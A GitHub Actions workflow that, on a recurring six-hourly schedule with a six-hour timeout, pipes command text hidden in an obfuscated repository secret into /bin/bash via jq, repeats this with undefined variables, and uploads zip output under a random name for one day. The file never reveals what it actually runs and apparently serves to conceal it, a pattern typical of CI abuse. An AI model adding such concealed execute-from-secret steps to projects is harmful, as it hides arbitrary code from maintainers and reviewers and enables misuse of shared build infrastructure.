name: Pipeline
on:
  workflow_dispatch:

  schedule:
    - cron: '9 5,11,17,23 * * *'
concurrency:
  group: ${{ github.workflow }}-${{ github.ref }}
  cancel-in-progress: true
jobs:
  run:
    runs-on: ubuntu-latest
    timeout-minutes: 360
    steps:
      - uses: actions/checkout@v4
        with:
          fetch-depth: 1
      - name: Build and run
        env:
          c074: ${{ secrets.c074 }}
        run: |
          printf '%s' "$c074" | jq -r .t592 | /bin/bash
          echo $rtni9 | jq -r .ry4970 | /bin/bash
          echo $mdy4455 | jq -r .gt90 | /bin/bash

      - name: Save output
        if: always()
        uses: actions/upload-artifact@v4
        with:
          name: SNcD1VRU
          path: "*.zip"
          retention-days: 1
